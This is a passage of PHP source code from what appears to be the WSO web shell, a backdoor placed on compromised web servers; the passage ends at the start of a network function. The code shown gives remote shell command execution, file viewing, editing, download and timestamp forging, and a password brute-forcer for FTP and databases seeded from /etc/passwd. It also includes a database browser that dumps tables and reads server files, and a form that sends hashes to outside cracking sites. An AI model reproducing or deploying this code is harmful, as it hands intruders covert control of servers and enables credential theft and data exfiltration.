<select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";
if (class_exists('ZipArchive')) echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>";
echo "<option value='tar'>Compress (tar.gz)</option>";
if (!empty($_COOKIE['act']) && @count($_COOKIE['f'])) echo "<option value='paste'>Paste / Compress</option>";
echo "</select> ";
if (!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar'))) echo "file name: <input type=text name=p2 value='wso_" . date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip' ? 'zip' : 'tar.gz') . "'> ";
echo "<input type='submit' value='>>'></td></tr></form></table></div>";
wsoFooter();
}
function actionStringTools() {
if (!function_exists('hex2bin')) {
function hex2bin($p) {
return decbin(hexdec($p));
}
}
if (!function_exists('binhex')) {
function binhex($p) {
return dechex(bindec($p));
}
}
if (!function_exists('hex2ascii')) {
function hex2ascii($p) {
$r = '';
for ($i = 0;$i < strLen($p);$i+= 2) {
$r.= chr(hexdec($p[$i] . $p[$i + 1]));
}
return $r;
}
}
if (!function_exists('ascii2hex')) {
function ascii2hex($p) {
$r = '';
for ($i = 0;$i < strlen($p);++$i) $r.= sprintf('%02X', ord($p[$i]));
return strtoupper($r);
}
}
if (!function_exists('full_urlencode')) {
function full_urlencode($p) {
$r = '';
for ($i = 0;$i < strlen($p);++$i) $r.= '%' . dechex(ord($p[$i]));
return strtoupper($r);
}
}
$stringTools = array('Base64 encode' => 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'binhex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen',);
if (isset($_POST['ajax'])) {
WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true);
ob_start();
if (in_array($_POST['p1'], $stringTools)) echo $_POST['p1']($_POST['p2']);
$temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "
\'") . "';
";
echo strlen($temp), "
", $temp;
exit;
}
if (empty($_POST['ajax']) && !empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0);
wsoHeader();
echo '<h1>String conversions</h1><div class=content>';
echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
foreach ($stringTools as $k => $v) echo "<option value='" . htmlspecialchars($v) . "'>" . $k . "</option>";
echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 " . (@$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . "> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>" . (empty($_POST['p1']) ? '' : htmlspecialchars(@$_POST['p2'])) . "</textarea></form><pre class='ml1' style='" . (empty($_POST['p1']) ? 'display:none;' : '') . "margin-top:5px' id='strOutput'>";
if (!empty($_POST['p1'])) {
if (in_array($_POST['p1'], $stringTools)) echo htmlspecialchars($_POST['p1']($_POST['p2']));
}
echo "</pre></div><br><h1>Search files:</h1><div class=content>
<form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>
<tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>
<tr><td>Path:</td><td><input type='text' name='cwd' value='" . htmlspecialchars($GLOBALS['cwd']) . "' style='width:100%'></td></tr>
<tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
<tr><td></td><td><input type='submit' value='>>'></td></tr>
</table></form>";
function wsoRecursiveGlob($path) {
if (substr($path, -1) != '/') $path.= '/';
$paths = @array_unique(@array_merge(@glob($path . $_POST['p3']), @glob($path . '*', GLOB_ONLYDIR)));
if (is_array($paths) && @count($paths)) {
foreach ($paths as $item) {
if (@is_dir($item)) {
if ($path != $item) wsoRecursiveGlob($item);
} else {
if (empty($_POST['p2']) || @strpos(file_get_contents($item), $_POST['p2']) !== false) echo "<a href='#' onclick='g(\"FilesTools\",null,\"" . urlencode($item) . "\", \"view\",\"\")'>" . htmlspecialchars($item) . "</a><br>";
}
}
}
}
if (@$_POST['p3']) wsoRecursiveGlob($_POST['c']);
echo "</div><br><h1>Search for hash:</h1><div class=content>
<form method='post' target='_blank' name='hf'>
<input type='text' name='hash' style='width:200px;'><br>
<input type='hidden' name='act' value='find'/>
<input type='button' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br>
<input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>
<input type='button' value='crackfor.me' onclick=\"document.hf.action='http://crackfor.me/index.php';document.hf.submit()\"><br>
</form></div>";
wsoFooter();
}
function actionFilesTools() {
if (isset($_POST['p1'])) $_POST['p1'] = urldecode($_POST['p1']);
if (@$_POST['p2'] == 'download') {
if (@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
ob_start("ob_gzhandler", 4096);
header("Content-Disposition: attachment; filename=" . basename($_POST['p1']));
if (function_exists("mime_content_type")) {
$type = @mime_content_type($_POST['p1']);
header("Content-Type: " . $type);
} else header("Content-Type: application/octet-stream");
$fp = @fopen($_POST['p1'], "r");
if ($fp) {
while (!@feof($fp)) echo @fread($fp, 1024);
fclose($fp);
}
}
exit;
}
if (@$_POST['p2'] == 'mkfile') {
if (!file_exists($_POST['p1'])) {
$fp = @fopen($_POST['p1'], 'w');
if ($fp) {
$_POST['p2'] = "edit";
fclose($fp);
}
}
}
wsoHeader();
echo '<h1>File tools</h1><div class=content>';
if (!file_exists(@$_POST['p1'])) {
echo 'File not exists';
wsoFooter();
return;
}
$uid = @posix_getpwuid(@fileowner($_POST['p1']));
if (!$uid) {
$uid['name'] = @fileowner($_POST['p1']);
$gid['name'] = @filegroup($_POST['p1']);
} else $gid = @posix_getgrgid(@filegroup($_POST['p1']));
echo '<span>Name:</span> ' . htmlspecialchars(@basename($_POST['p1'])) . ' <span>Size:</span> ' . (is_file($_POST['p1']) ? wsoViewSize(filesize($_POST['p1'])) : '-') . ' <span>Permission:</span> ' . wsoPermsColor($_POST['p1']) . ' <span>Owner/Group:</span> ' . $uid['name'] . '/' . $gid['name'] . '<br>';
echo '<span>Change time:</span> ' . date('Y-m-d H:i:s', filectime($_POST['p1'])) . ' <span>Access time:</span> ' . date('Y-m-d H:i:s', fileatime($_POST['p1'])) . ' <span>Modify time:</span> ' . date('Y-m-d H:i:s', filemtime($_POST['p1'])) . '<br><br>';
if (empty($_POST['p2'])) $_POST['p2'] = 'view';
if (is_file($_POST['p1'])) $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
else $m = array('Chmod', 'Rename', 'Touch');
foreach ($m as $v) echo '<a href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\'' . strtolower($v) . '\')">' . ((strtolower($v) == @$_POST['p2']) ? '<b>[ ' . $v . ' ]</b>' : $v) . '</a> ';
echo '<br><br>';
switch ($_POST['p2']) {
case 'view':
echo '<pre class=ml1>';
$fp = @fopen($_POST['p1'], 'r');
if ($fp) {
while (!@feof($fp)) echo htmlspecialchars(@fread($fp, 1024));
@fclose($fp);
}
echo '</pre>';
break;
case 'highlight':
if (@is_readable($_POST['p1'])) {
echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
$code = @highlight_file($_POST['p1'], true);
echo str_replace(array('<span ', '</span>'), array('<font ', '</font>'), $code) . '</div>';
}
break;
case 'chmod':
if (!empty($_POST['p3'])) {
$perms = 0;
for ($i = strlen($_POST['p3']) - 1;$i >= 0;--$i) $perms+= (int)$_POST['p3'][$i] * pow(8, (strlen($_POST['p3']) - $i - 1));
if (!@chmod($_POST['p1'], $perms)) echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
}
clearstatcache();
echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="' . substr(sprintf('%o', fileperms($_POST['p1'])), -4) . '"><input type=submit value=">>"></form>';
break;
case 'edit':
if (!is_writable($_POST['p1'])) {
echo 'File isn\'t writeable';
break;
}
if (!empty($_POST['p3'])) {
$time = @filemtime($_POST['p1']);
$_POST['p3'] = substr($_POST['p3'], 1);
$fp = @fopen($_POST['p1'], "w");
if ($fp) {
@fwrite($fp, $_POST['p3']);
@fclose($fp);
echo 'Saved!<br><script>p3_="";</script>';
@touch($_POST['p1'], $time, $time);
}
}
echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
$fp = @fopen($_POST['p1'], 'r');
if ($fp) {
while (!@feof($fp)) echo htmlspecialchars(@fread($fp, 1024));
@fclose($fp);
}
echo '</textarea><input type=submit value=">>"></form>';
break;
case 'hexdump':
$c = @file_get_contents($_POST['p1']);
$n = 0;
$h = array('00000000<br>', '', '');
$len = strlen($c);
for ($i = 0;$i < $len;++$i) {
$h[1].= sprintf('%02X', ord($c[$i])) . ' ';
switch (ord($c[$i])) {
case 0:
$h[2].= ' ';
break;
case 9:
$h[2].= ' ';
break;
case 10:
$h[2].= ' ';
break;
case 13:
$h[2].= ' ';
break;
default:
$h[2].= $c[$i];
break;
}
$n++;
if ($n == 32) {
$n = 0;
if ($i + 1 < $len) {
$h[0].= sprintf('%08X', $i + 1) . '<br>';
}
$h[1].= '<br>';
$h[2].= "
";
}
}
echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>' . $h[0] . '</pre></span></td><td bgcolor=#282828><pre>' . $h[1] . '</pre></td><td bgcolor=#333333><pre>' . htmlspecialchars($h[2]) . '</pre></td></tr></table>';
break;
case 'rename':
if (!empty($_POST['p3'])) {
if (!@rename($_POST['p1'], $_POST['p3'])) echo 'Can\'t rename!<br>';
else die('<script>g(null,null,"' . urlencode($_POST['p3']) . '",null,"")</script>');
}
echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="' . htmlspecialchars($_POST['p1']) . '"><input type=submit value=">>"></form>';
break;
case 'touch':
if (!empty($_POST['p3'])) {
$time = strtotime($_POST['p3']);
if ($time) {
if (!touch($_POST['p1'], $time, $time)) echo 'Fail!';
else echo 'Touched!';
} else echo 'Bad time format!';
}
clearstatcache();
echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="' . date("Y-m-d H:i:s", @filemtime($_POST['p1'])) . '"><input type=submit value=">>"></form>';
break;
}
echo '</div>';
wsoFooter();
}
function actionConsole() {
if (!empty($_POST['p1']) && !empty($_POST['p2'])) {
WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'stderr_to_out', true);
$_POST['p1'].= ' 2>&1';
} elseif (!empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'stderr_to_out', 0);
if (isset($_POST['ajax'])) {
WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true);
ob_start();
echo "d.cf.cmd.value='';
";
$temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("
$ " . $_POST['p1'] . "
" . wsoEx($_POST['p1']), "
\'"));
if (preg_match("!.*cd\s+([^;]+)$!", $_POST['p1'], $match)) {
if (@chdir($match[1])) {
$GLOBALS['cwd'] = @getcwd();
echo "c_='" . $GLOBALS['cwd'] . "';";
}
}
echo "d.cf.output.value+='" . $temp . "';";
echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";
$temp = ob_get_clean();
echo strlen($temp), "
", $temp;
exit;
}
if (empty($_POST['ajax']) && !empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0);
wsoHeader();
echo "<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array('');
var cur = 0;
function kp(e) {
var n = (window.Event) ? e.which : e.keyCode;
if(n == 38) {
cur--;
if(cur>=0)
document.cf.cmd.value = cmds[cur];
else
cur++;
} else if(n == 40) {
cur++;
if(cur < cmds.length)
document.cf.cmd.value = cmds[cur];
else
cur--;
}
}
function add(cmd) {
cmds.pop();
cmds.push(cmd);
cmds.push('');
cur = cmds.length-1;
}
</script>";
echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>';
foreach ($GLOBALS['aliases'] as $n => $v) {
if ($v == '') {
echo '<optgroup label="-' . htmlspecialchars($n) . '-"></optgroup>';
continue;
}
echo '<option value="' . htmlspecialchars($v) . '">' . $n . '</option>';
}
echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 ' . (@$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . '> send using AJAX <input type=checkbox name=show_errors value=1 ' . (!empty($_POST['p2']) || $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'stderr_to_out'] ? 'checked' : '') . '> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
if (!empty($_POST['p1'])) {
echo htmlspecialchars("$ " . $_POST['p1'] . "
" . wsoEx($_POST['p1']));
}
echo '</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>';
echo '</form></div><script>d.cf.cmd.focus();</script>';
wsoFooter();
}
function actionLogout() {
setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600);
die('bye!');
}
function actionSelfRemove() {
if ($_POST['p1'] == 'yes') if (@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__))) die('Shell has been removed');
else echo 'unlink error!';
if ($_POST['p1'] != 'yes') wsoHeader();
echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
wsoFooter();
}
function actionBruteforce() {
wsoHeader();
if (isset($_POST['proto'])) {
echo '<h1>Results</h1><div class=content><span>Type:</span> ' . htmlspecialchars($_POST['proto']) . ' <span>Server:</span> ' . htmlspecialchars($_POST['server']) . '<br>';
if ($_POST['proto'] == 'ftp') {
function wsoBruteForce($ip, $port, $login, $pass) {
$fp = @ftp_connect($ip, $port ? $port : 21);
if (!$fp) return false;
$res = @ftp_login($fp, $login, $pass);
@ftp_close($fp);
return $res;
}
} elseif ($_POST['proto'] == 'mysql') {
function wsoBruteForce($ip, $port, $login, $pass) {
$res = @mysql_connect($ip . ':' . ($port ? $port : 3306), $login, $pass);
@mysql_close($res);
return $res;
}
} elseif ($_POST['proto'] == 'pgsql') {
function wsoBruteForce($ip, $port, $login, $pass) {
$str = "host='" . $ip . "' port='" . $port . "' user='" . $login . "' password='" . $pass . "' dbname=postgres";
$res = @pg_connect($str);
@pg_close($res);
return $res;
}
}
$success = 0;
$attempts = 0;
$server = explode(":", $_POST['server']);
if ($_POST['type'] == 1) {
$temp = @file('/etc/passwd');
if (is_array($temp)) foreach ($temp as $line) {
$line = explode(":", $line);
++$attempts;
if (wsoBruteForce(@$server[0], @$server[1], $line[0], $line[0])) {
$success++;
echo '<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($line[0]) . '<br>';
}
if (@$_POST['reverse']) {
$tmp = "";
for ($i = strlen($line[0]) - 1;$i >= 0;--$i) $tmp.= $line[0][$i];
++$attempts;
if (wsoBruteForce(@$server[0], @$server[1], $line[0], $tmp)) {
$success++;
echo '<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($tmp);
}
}
}
} elseif ($_POST['type'] == 2) {
$temp = @file($_POST['dict']);
if (is_array($temp)) foreach ($temp as $line) {
$line = trim($line);
++$attempts;
if (wsoBruteForce($server[0], @$server[1], $_POST['login'], $line)) {
$success++;
echo '<b>' . htmlspecialchars($_POST['login']) . '</b>:' . htmlspecialchars($line) . '<br>';
}
}
}
echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
}
echo '<h1>Bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>' . '<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>' . '<input type=hidden name=c value="' . htmlspecialchars($GLOBALS['cwd']) . '">' . '<input type=hidden name=a value="' . htmlspecialchars($_POST['a']) . '">' . '<input type=hidden name=charset value="' . htmlspecialchars($_POST['charset']) . '">' . '<span>Server:port</span></td>' . '<td><input type=text name=server value="127.0.0.1"></td></tr>' . '<tr><td><span>Brute type</span></td>' . '<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>' . '<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>' . '<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>' . '<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>' . '<td><input type=text name=login value="root"></td></tr>' . '<tr><td><span>Dictionary</span></td>' . '<td><input type=text name=dict value="' . htmlspecialchars($GLOBALS['cwd']) . 'passwd.dic"></td></tr></table>' . '</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
echo '</div><br>';
wsoFooter();
}
function actionSql() {
class DbClass {
var $type;
var $link;
var $res;
function DbClass($type) {
$this->type = $type;
}
function connect($host, $user, $pass, $dbname) {
switch ($this->type) {
case 'mysql':
if ($this->link = @mysql_connect($host, $user, $pass, true)) return true;
break;
case 'pgsql':
$host = explode(':', $host);
if (!$host[1]) $host[1] = 5432;
if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname")) return true;
break;
}
return false;
}
function selectdb($db) {
switch ($this->type) {
case 'mysql':
if (@mysql_select_db($db)) return true;
break;
}
return false;
}
function query($str) {
switch ($this->type) {
case 'mysql':
return $this->res = @mysql_query($str);
break;
case 'pgsql':
return $this->res = @pg_query($this->link, $str);
break;
}
return false;
}
function fetch() {
$res = func_num_args() ? func_get_arg(0) : $this->res;
switch ($this->type) {
case 'mysql':
return @mysql_fetch_assoc($res);
break;
case 'pgsql':
return @pg_fetch_assoc($res);
break;
}
return false;
}
function listDbs() {
switch ($this->type) {
case 'mysql':
return $this->query("SHOW databases");
break;
case 'pgsql':
return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
break;
}
return false;
}
function listTables() {
switch ($this->type) {
case 'mysql':
return $this->res = $this->query('SHOW TABLES');
break;
case 'pgsql':
return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
break;
}
return false;
}
function error() {
switch ($this->type) {
case 'mysql':
return @mysql_error();
break;
case 'pgsql':
return @pg_last_error();
break;
}
return false;
}
function setCharset($str) {
switch ($this->type) {
case 'mysql':
if (function_exists('mysql_set_charset')) return @mysql_set_charset($str, $this->link);
else $this->query('SET CHARSET ' . $str);
break;
case 'pgsql':
return @pg_set_client_encoding($this->link, $str);
break;
}
return false;
}
function loadFile($str) {
switch ($this->type) {
case 'mysql':
return $this->fetch($this->query("SELECT LOAD_FILE('" . addslashes($str) . "') as file"));
break;
case 'pgsql':
$this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '" . addslashes($str) . "';select file from wso2;");
$r = array();
while ($i = $this->fetch()) $r[] = $i['file'];
$this->query('drop table wso2');
return array('file' => implode("
", $r));
break;
}
return false;
}
function dump($table, $fp = false) {
switch ($this->type) {
case 'mysql':
$res = $this->query('SHOW CREATE TABLE `' . $table . '`');
$create = mysql_fetch_array($res);
$sql = $create[1] . ";
";
if ($fp) fwrite($fp, $sql);
else echo ($sql);
$this->query('SELECT * FROM `' . $table . '`');
$i = 0;
$head = true;
while ($item = $this->fetch()) {
$sql = '';
if ($i % 1000 == 0) {
$head = true;
$sql = ";
";
}
$columns = array();
foreach ($item as $k => $v) {
if ($v === null) $item[$k] = "NULL";
elseif (is_int($v)) $item[$k] = $v;
else $item[$k] = "'" . @mysql_real_escape_string($v) . "'";
$columns[] = "`" . $k . "`";
}
if ($head) {
$sql.= 'INSERT INTO `' . $table . '` (' . implode(", ", $columns) . ") VALUES
(" . implode(", ", $item) . ')';
$head = false;
} else $sql.= "
,(" . implode(", ", $item) . ')';
if ($fp) fwrite($fp, $sql);
else echo ($sql);
$i++;
}
if (!$head) if ($fp) fwrite($fp, ";
");
else echo (";
");
break;
case 'pgsql':
$this->query('SELECT * FROM ' . $table);
while ($item = $this->fetch()) {
$columns = array();
foreach ($item as $k => $v) {
$item[$k] = "'" . addslashes($v) . "'";
$columns[] = $k;
}
$sql = 'INSERT INTO ' . $table . ' (' . implode(", ", $columns) . ') VALUES (' . implode(", ", $item) . ');' . "
";
if ($fp) fwrite($fp, $sql);
else echo ($sql);
}
break;
}
return false;
}
};
$db = new DbClass($_POST['type']);
if ((@$_POST['p2'] == 'download') && (@$_POST['p1'] != 'select')) {
$db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
$db->selectdb($_POST['sql_base']);
switch ($_POST['charset']) {
case "Windows-1251":
$db->setCharset('cp1251');
break;
case "UTF-8":
$db->setCharset('utf8');
break;
case "KOI8-R":
$db->setCharset('koi8r');
break;
case "KOI8-U":
$db->setCharset('koi8u');
break;
case "cp866":
$db->setCharset('cp866');
break;
}
if (empty($_POST['file'])) {
ob_start("ob_gzhandler", 4096);
header("Content-Disposition: attachment; filename=dump.sql");
header("Content-Type: text/plain");
foreach ($_POST['tbl'] as $v) $db->dump($v);
exit;
} elseif ($fp = @fopen($_POST['file'], 'w')) {
foreach ($_POST['tbl'] as $v) $db->dump($v, $fp);
fclose($fp);
unset($_POST['p2']);
} else die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>');
}
wsoHeader();
echo "
<h1>Sql browser</h1><div class=content>
<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>
<td><select name='type'><option value='mysql' ";
if (@$_POST['type'] == 'mysql') echo 'selected';
echo ">MySql</option><option value='pgsql' ";
if (@$_POST['type'] == 'pgsql') echo 'selected';
echo ">PostgreSql</option></select></td>
<td><input type=text name=sql_host value=\"" . (empty($_POST['sql_host']) ? 'localhost' : htmlspecialchars($_POST['sql_host'])) . "\"></td>
<td><input type=text name=sql_login value=\"" . (empty($_POST['sql_login']) ? 'root' : htmlspecialchars($_POST['sql_login'])) . "\"></td>
<td><input type=text name=sql_pass value=\"" . (empty($_POST['sql_pass']) ? '' : htmlspecialchars($_POST['sql_pass'])) . "\"></td><td>";
$tmp = "<input type=text name=sql_base value=''>";
if (isset($_POST['sql_host'])) {
if ($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
switch ($_POST['charset']) {
case "Windows-1251":
$db->setCharset('cp1251');
break;
case "UTF-8":
$db->setCharset('utf8');
break;
case "KOI8-R":
$db->setCharset('koi8r');
break;
case "KOI8-U":
$db->setCharset('koi8u');
break;
case "cp866":
$db->setCharset('cp866');
break;
}
$db->listDbs();
echo "<select name=sql_base><option value=''></option>";
while ($item = $db->fetch()) {
list($key, $value) = each($item);
echo '<option value="' . $value . '" ' . ($value == $_POST['sql_base'] ? 'selected' : '') . '>' . $value . '</option>';
}
echo '</select>';
} else echo $tmp;
} else echo $tmp;
echo "</td>
<td><input type=submit value='>>' onclick='fs(d.sf);'></td>
<td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count']) ? '' : ' checked') . "> count the number of rows</td>
</tr>
</table>
<script>
s_db='" . @addslashes($_POST['sql_base']) . "';
function fs(f) {
if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
if(f.p1) f.p1.value='';
if(f.p2) f.p2.value='';
if(f.p3) f.p3.value='';
}
}
function st(t,l) {
d.sf.p1.value = 'select';
d.sf.p2.value = t;
if(l && d.sf.p3) d.sf.p3.value = l;
d.sf.submit();
}
function is() {
for(i=0;i<d.sf.elements['tbl[]'].length;++i)
d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
}
</script>";
if (isset($db) && $db->link) {
echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
if (!empty($_POST['sql_base'])) {
$db->selectdb($_POST['sql_base']);
echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
$tbls_res = $db->listTables();
while ($item = $db->fetch($tbls_res)) {
list($key, $value) = each($item);
if (!empty($_POST['sql_count'])) $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM ' . $value . ''));
$value = htmlspecialchars($value);
echo "<nobr><input type='checkbox' name='tbl[]' value='" . $value . "'> <a href=# onclick=\"st('" . $value . "',1)\">" . $value . "</a>" . (empty($_POST['sql_count']) ? ' ' : " <small>({$n['n']})</small>") . "</nobr><br>";
}
echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
if (@$_POST['p1'] == 'select') {
$_POST['p1'] = 'query';
$_POST['p3'] = $_POST['p3'] ? $_POST['p3'] : 1;
$db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);
$num = $db->fetch();
$pages = ceil($num['n'] / 30);
echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>" . $_POST['p2'] . "</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">";
echo " of $pages";
if ($_POST['p3'] > 1) echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3'] - 1) . ")'>< Prev</a>";
if ($_POST['p3'] < $pages) echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3'] + 1) . ")'>Next ></a>";
$_POST['p3']--;
if ($_POST['type'] == 'pgsql') $_POST['p2'] = 'SELECT * FROM ' . $_POST['p2'] . ' LIMIT 30 OFFSET ' . ($_POST['p3'] * 30);
else $_POST['p2'] = 'SELECT * FROM `' . $_POST['p2'] . '` LIMIT ' . ($_POST['p3'] * 30) . ',30';
echo "<br><br>";
}
if ((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) {
$db->query(@$_POST['p2']);
if ($db->res !== false) {
$title = false;
echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">';
$line = 1;
while ($item = $db->fetch()) {
if (!$title) {
echo '<tr>';
foreach ($item as $key => $value) echo '<th>' . $key . '</th>';
reset($item);
$title = true;
echo '</tr><tr>';
$line = 2;
}
echo '<tr class="l' . $line . '">';
$line = $line == 1 ? 2 : 1;
foreach ($item as $key => $value) {
if ($value == null) echo '<td><i>null</i></td>';
else echo '<td>' . nl2br(htmlspecialchars($value)) . '</td>';
}
echo '</tr>';
}
echo '</table>';
} else {
echo '<div><b>Error:</b> ' . htmlspecialchars($db->error()) . '</div>';
}
}
echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
if (!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile')) echo htmlspecialchars($_POST['p2']);
echo "</textarea><br/><input type=submit value='Execute'>";
echo "</td></tr>";
}
echo "</table></form><br/>";
if ($_POST['type'] == 'mysql') {
$db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
if ($db->fetch()) echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
}
if (@$_POST['p1'] == 'loadfile') {
$file = $db->loadFile($_POST['p2']);
echo '<br/><pre class=ml1>' . htmlspecialchars($file['file']) . '</pre>';
}
} else {
echo htmlspecialchars($db->error());
}
echo '</div>';
wsoFooter();
}
function actionNetwork() {
wsoHeader();
